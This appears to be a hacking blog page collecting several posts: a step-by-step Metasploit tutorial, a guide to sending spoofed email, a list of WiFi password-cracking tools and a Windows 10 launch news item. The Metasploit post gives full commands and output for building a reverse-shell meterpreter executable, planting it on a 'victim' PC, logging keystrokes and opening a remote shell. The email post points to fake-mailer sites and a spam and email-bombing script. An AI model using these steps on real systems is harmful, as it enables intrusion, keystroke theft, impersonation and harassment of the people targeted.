Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple stepsPoint, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.
I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.
For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.
Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.

The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)
You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#
Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.


Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps

Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv
Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R
P.S.: The above information is just for educational purposes only. You should test it against the computer you own.






Continue reading
    Share:
Basics of working of Email ( You can skip this part)

Email stands for Electronic Mail. Email sending and receiving is controlled by the Email servers.Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally.Users from across the world register in to these Email servers and setup an Email account.


Email Travelling Path :-
Let’s say we have two Email providers, one is gmail.com and other is yahoo.com, ABC is a registered user in gmail.com and XYZ is a registered user in yahoo.com.
• ABC signs in to his Email account in gmail.com, he then writes a mail to the xyz@yahoo.com and sends the message.
• But what happens behind the curtains, the Email from the computer of abc@gmail.com is forwarded to the Email server of gmail.com. Server of gmail.com then looks for yahoo.com on the internet and forwards the Email of the yahoo.com for the account of XYZ@yahoo.com. Yahoo server puts that email in that account.
• XYZ then sits on computer and signs in to her Email account.Now she has the message in her Email inbox.



 Sending Fake/spoofed Email -:  Fake or spoofed email means the email from any email ID. It doesn't matter whether the sender's email really exists or not. Sender's email ID can be anything@anything.com. 


   Read the disclaimer before proceeding


Methods :-


1. Using Open Relay servers :  An open relay server is that which allows people to send email by connecting to it. User connect to it via telnet and instructs server to send email. This method is outdated or simply I should say that, it doesn't work. I would not talk about it more.

2. Using Websites : There are numberless websites that provide free service to send fake emails. But the problem is that they attach the advertisments along with your email.  But the best two, I have found that do not attach the advertisments.

www.emkei.cz      {have some advance options}
www.hidemyass.biz/fake-mailer/

3. Using mail sending scripts : The PHP contains mail sending function which allows us to send email with fake headers.
Download a php script from here.
We just need to upload the mail sending script on a web hosting site. It doesn't work on every webshosting site because there is no email sending support.  I have tested x10hosting.com (could take upto a day for account activation) , it works perfect. Some of the other are www.000webhost.com,byethehost5.com

Note: This script contains options of sending spoofed email, spamming and email bombing. Your hosting account might be immediately suspended on spamming/bombing. But it works perfect if you have any your own premium web hosting account. If you want to try email bomber, I could let you to use my own if sufficient people request in comments.

What is Email Spamming and Email Bombing ?

Email Bombing as clear from the name is sending the mass emails that is large number of emails to a email ID in a single click. Email spamming is like sending an email to large number of email IDs in a single click. These activties are performed mainly for the advertisements of the products or services provided by a company. Many spammers spam to collect individual's personal information through some stupid things like 'fill these details to get your lottery amount' and that information is sold to businessmen looking for the people of different categories. There could be many more reasons of spamming. Spammers use automated tools to collect as many emails available on websites,forms,chat rooms and send spams to them.

How to identify whether an email is real or spoofed ?

It can be done by checking headers. Email headers is simply the text which contains the information about the mail servers that the email encountered in its path from the sender to receiver. It contains a lot of other information too.
Note: I am just telling you a few points about this so that you would just get an idea about the approach. This may or may not depend on some factors.

We can view email headers in gmail by clicking at 'show orignal', in yahoo by clicking at 'Full headers' and such kinds of options in other email service providers.

If  you get an email displaying sender's email like someone@gmail.com, someone@hotmail.com, someone@yahoo.com . Then it should be orignated from gmail,hotmail and yahoo servers respectively. But if it doesn't, the most probably the email would be fake. 

I will show you by an example, I received three emails in my gmail inbox from sender's address "someone@gmail.com."  Sender's address shows me that they should have been orignated from gmail/google server, if they would be real.

Note : There is a field called "Return-path" in headers.  If the email ID shown in this field and email ID you get as sender's email ID doesnt match, then the email is surely fake.






Can we get sender's IP address from Email Headers ?

We may or may not. Gmail, yahoo normally do not reveal sender's IP address. But when we send an email from a php script,  the headers might reveal Sender's IP. The conclusion is that answer to this question varies from different email service providers and the way how email is sent.


Can we trace sender's location, if we get his IP address ?

The IP address could only tell that which Internet Service Provider (ISP) is used by sender. Further details can not be revealed without the help of that ISP. Normally the Public IP is dynamic that is it keeps changing. We need to ask ISP about the user who was assigned that IP at the time email was sent. If sender has purchased a static IP address, it doesn't matter that when exactly was email sent. He could easily be traced.
Continue reading
    Share:


Ten Free Wireless Hacking Software.

Internet is now a basic requirement be it office or home as it is majorly used in smartphones besides computer. Most of the times people prefer to use wireless network LAN which is much easier and cost effective.
It has been observed that the neighborhood WiFi hot-spots are visible on user’s device however one can get access to the same only by cracking password with the sole purpose of using free internet. Also in case of big firms where all the employees are connected through a wireless network admin might want to keep a check on the network traffic and hence even they need tools to crack the network.
Vulnerability in the wireless LAN is majorly due to poor configuration and poor encryption. Poor configuration includes the case of weak password mainly done purposefully by the network admin to check the network traffic. Poor encryption is dangerous as it is related to the 2 security protocols WEP (Wired Equivalent Privacy) and WPA (WiFi Protected Access) and WPA is again of 2 types WPA1 and WPA2, WPA was introduced in 2003 as WEP protocol was easy to crack. The tools used to hack the network is used either for the
  • purpose of sniffing the network : as is the case of network admins and
  • cracking the password: used by programmers to rectify the trouble shooting and by the people who want to use internet free of cost. It has been seen that based on this concept there are around 10 tools together which can be understood to hack wireless LAN.

Aircrack

Most popular wireless password cracking tool, it attacks 802.11a/b/g WEP and WPA. This tool manufacturers also provides tutorial for installation of the tool and its usage for cracking the password. Prior to using this tool it is essential to confirm that the wireless card can inject packets as this is basis of WEP attack. This can be downloaded from: http://www.aircrack-ng.org/
2) Cain & Able: This tool intercepts the network traffic and cracks the passwords forcibly using crypt-analysis attack methods. It also helps to recover the wireless network keys by analyzing routine protocols. Can be downloaded from : http://www.oxid.it/cain.html

inSSIDer

This tool has been awarded “Best Opensource Software in Networking” and is a paid software available at a cost of $19.99. This is popular scanner for Microsoft Windows and OS X operating systems and can do a lot of tasks which can be helpful for the admins to sniff the network LAN. Can be downloaded from : http://www.inssider.com/

WireShark

This is network protocol analyzer. So again good for the network admins to keep a check on the traffic. Basic requirement is that the user should have a good knowledge of the network protocol only then they can use this tool. Can be downloaded from : https://www.wireshark.org/

CoWPAtty

This tool is an automated dictionary attack tool for WPA-PSK. CoWPatty is simple to use however it is slow as tool uses the password dictionary for generating hack for each word contained in the dictionary by using the SSID. Can be downloaded from:http://sourceforge.net/projects/cowpatty/

Airjack

This is a Wi-Fi 802.11 packet injection tool. Mostly used to check for the “man-in-the-middle (MiTm) flaws” in the network and mitigate them. Can be downloaded from : http://sourceforge.net/projects/airjack/

WepAttack

This is an open source Linux tool for breaking 802.11 WEP keys. While working with this tool a WLAN card is required and basically the tool attacks working key using the dictionary words. Can be downloaded from : http://wepattack.sourceforge.net/

OmniPeek

This is again network analyzer tool working only on Windows OS. This tools captures and analyzes the network traffic. The tool can be also used for trouble shooting. Can be downloaded from : http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

CommView for WiFi

This is for wireless monitoring and protocol analysis. Captured packets can be decoded by user-defined WEP or WPA keys.  This again is mainly used to monitor the WiFi traffic by the professional programmers, protocol admins and even at homes. Can be downloaded from : http://www.tamos.com/products/commwifi/

CloudCracker

This is online password cracking for WPA protected WiFi networks. It is used to crack the passwords by using a dictionary of around 300 million words. Can be downloaded from : https://www.cloudcracker.com/
Most of these tools are free; some of them are for protocol analyzers to monitor the trouble shooting whereas others are for hacking the password for unauthorized internet access also there are tools which use the dictionary words to crack the password.
For the network admins and the professional programmers these tools should be more helpful for understanding the cracking of password and hence helping them professionally.
However, one needs to be cautious when using the tools as this might be an offense to use the tools to crack the passwords and get unauthorized access to the internet in some countries. Also such kind of tools are also used by cyber criminals and terrorists to get easy access for free usage of internet anonymously.
Continue reading
    Share:


Windows 10 has been installed on more than 14 million devices sincelaunching worldwide on Wednesday 29 July, Microsoft has announced.
In the first 24 hours after beginning the rollout, Microsoft said it saw "unprecedented demand" for the new operating system, with reviews and customer feedback "overwhelmingly positive" around the globe.
The company has previously revealed that it wants Windows 10 to be on one billion devices by 2018. However, while the PC version of the operating system has been well received, market analysts have questioned its ability to compete with Android and iOS on smartphones.
Although millions of people have successfully completed the installation, there are many more who have reserved their upgrade to Windows 10 and are still waiting to received it.
"As we’ve shared, our top priority has been ensuring that everyone has a great upgrade experience, so, we are carefully rolling out Windows 10 in phases," said Yusuf Mehdi, Microsoft's corporate vice president for Windows and Devices Group, in a blog post.
"Rest assured we are working 24×7 to continue the upgrade process. We are grateful for your excitement and enthusiasm and we appreciate your patience over the days and weeks ahead as we carefully roll out Windows 10 in phases to all of you that have reserved."
Windows 10 is the latest version of Microsoft's operating system software, combining what it describes as the "best elements" of Windows 7 and Windows 8. It features a redesigned Start menu, which brings together the Windows 7 navigation panel with "live tiles" from Windows 8, and a new web browser called Edge.
Windows 10 also comes with Microsoft's virtual personal assistant, Cortana, which pops up with notifications and suggestions, and learns the user's preferences over time.
Unlike with previous versions, there will not be a separate Windows Phone 10 operating system. Instead, Windows 10 will be used across all Microsoft devices, including PCs, tablets and smartphones – as well as the Xbox games console and Microsoft's holographic headset, HoloLens.
A feature called Continuum means that the software automatically detects whether there is a keyboard attached to the device and selects the most appropriate mode.

Windows 7 and Windows 8.1 users were given the opportunity to pre-order their free copy of Windows 10 in the weeks leading up to the launch, and these are the people to whom Microsoft is currently rolling out the update. Customers will be notified once their PC is ready for Windows 10 with a notification in their system tray.
If you didn’t reserve your upgrade to Windows 10, you can still reserve your free upgrade using the "Get Windows 10" app on your Windows 7 or Windows 8.1 PC, or downloading it directly using the media creation tool onthis page.
Continue reading
    Share: